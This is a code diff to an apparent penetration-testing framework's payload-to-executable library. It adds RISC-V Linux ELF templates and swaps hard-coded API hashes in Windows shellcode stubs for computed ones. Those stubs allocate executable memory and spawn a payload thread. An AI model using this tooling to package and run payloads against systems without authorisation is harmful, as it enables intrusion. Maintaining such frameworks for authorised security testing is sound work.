@@ -194,6 +194,21 @@ require 'digest/sha1'
       end
       # XXX: Add remaining MIPSLE systems here
     end
+
+    if arch.index(ARCH_RISCV32LE)
+      if plat.index(Msf::Module::Platform::Linux)
+        return to_linux_riscv32le_elf(framework, code)
+      end
+      # TODO: Add remaining RISCV32LE systems here
+    end
+
+    if arch.index(ARCH_RISCV64LE)
+      if plat.index(Msf::Module::Platform::Linux)
+        return to_linux_riscv64le_elf(framework, code)
+      end
+      # TODO: Add remaining RISCV64LE systems here
+    end
+
     nil
   end
 
@@ -1239,6 +1254,50 @@ require 'digest/sha1'
     to_exe_elf(framework, opts, "template_mipsbe_linux.bin", code, true)
   end
 
+  # Create a RISC-V 64-bit LE Linux ELF containing the payload provided in +code+
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_riscv64le_elf(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_riscv64le_linux.bin", code)
+  end
+
+  # Create a RISC-V 64-bit LE Linux ELF_DYN containing the payload provided in +code+
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_riscv64le_elf_dll(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_riscv64le_linux_dll.bin", code)
+  end
+
+  # Create a RISC-V 32-bit LE Linux ELF containing the payload provided in +code+
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_riscv32le_elf(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_riscv32le_linux.bin", code)
+  end
+
+  # Create a RISC-V 32-bit LE Linux ELF_DYN containing the payload provided in +code+
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_riscv32le_elf_dll(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_riscv32le_linux_dll.bin", code)
+  end
+
   # self.to_exe_vba
   #
   # @param exes [String]
@@ -1658,8 +1717,8 @@ require 'digest/sha1'
 </servlet>
 </web-app>
 }
-    web_xml.gsub!(/NAME/, app_name)
-    web_xml.gsub!(/PAYLOAD/, jsp_name)
+    web_xml.gsub!('NAME', app_name)
+    web_xml.gsub!('PAYLOAD', jsp_name)
 
     zip = Rex::Zip::Archive.new
     zip.add_file('META-INF/', '', meta_inf)
@@ -1777,15 +1836,15 @@ require 'digest/sha1'
     ; Note: Execution is not expected to (successfully) continue past this block
 
     exitfunk:
-      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
-      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}    ; The EXITFUNK as specified by user...
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}        ; hash( "kernel32.dll", "GetVersion" )
       mov eax, ebp
       call eax               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye             ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye      ;
-      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+      mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
     goodbye:                 ; We now perform the actual call to the exit function
       push byte 0            ; push the exit function parameter
       push ebx               ; push the hash of the exit function
@@ -1808,7 +1867,7 @@ require 'digest/sha1'
       push 0x1000            ; MEM_COMMIT
       push esi               ; Push the length value of the wrapped code block
       push byte 0            ; NULL as we dont care where the allocation is.
-      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}        ; hash( "kernel32.dll", "VirtualAlloc" )
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
       mov ebx, eax           ; Store allocated address in ebx
@@ -1887,14 +1946,14 @@ require 'digest/sha1'
     ; Note: Execution is not expected to (successfully) continue past this block
 
     exitfunk:
-      mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
-      push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+      mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}    ; The EXITFUNK as specified by user...
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}        ; hash( "kernel32.dll", "GetVersion" )
       call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye       ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
       jne goodbye      ;
-      mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+      mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
     goodbye:                 ; We now perform the actual call to the exit function
       push byte 0            ; push the exit function parameter
       push ebx               ; push the hash of the exit function
@@ -1918,7 +1977,7 @@ require 'digest/sha1'
       push 0x1000            ; MEM_COMMIT
       push esi               ; Push the length value of the wrapped code block
       push byte 0            ; NULL as we dont care where the allocation is.
-      push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}        ; hash( "kernel32.dll", "VirtualAlloc" )
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
       mov ebx, eax           ; Store allocated address in ebx
@@ -1943,7 +2002,7 @@ require 'digest/sha1'
       push ebx               ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
       push eax               ; SIZE_T dwStackSize (0 for default)
       push eax               ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
-      push 0x160D6838        ; hash( "kernel32.dll", "CreateThread" )
+      push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateThread')}        ; hash( "kernel32.dll", "CreateThread" )
       call ebp               ; Spawn payload thread
 
       pop eax                ; Skip
@@ -2125,6 +2184,10 @@ require 'digest/sha1'
           to_linux_mipsbe_elf(framework, code, exeopts)
         when ARCH_MIPSLE
           to_linux_mipsle_elf(framework, code, exeopts)
+        when ARCH_RISCV32LE
+          to_linux_riscv32le_elf(framework, code, exeopts)
+        when ARCH_RISCV64LE
+          to_linux_riscv64le_elf(framework, code, exeopts)
         end
       elsif plat && plat.index(Msf::Module::Platform::BSD)
         case arch
@@ -2153,6 +2216,10 @@ require 'digest/sha1'
           to_linux_armle_elf_dll(framework, code, exeopts)
         when ARCH_AARCH64
           to_linux_aarch64_elf_dll(framework, code, exeopts)
+        when ARCH_RISCV32LE
+          to_linux_riscv32le_elf_dll(framework, code, exeopts)
+        when ARCH_RISCV64LE
+          to_linux_riscv64le_elf_dll(framework, code, exeopts)
         end
       end
     when 'macho', 'osx-app'
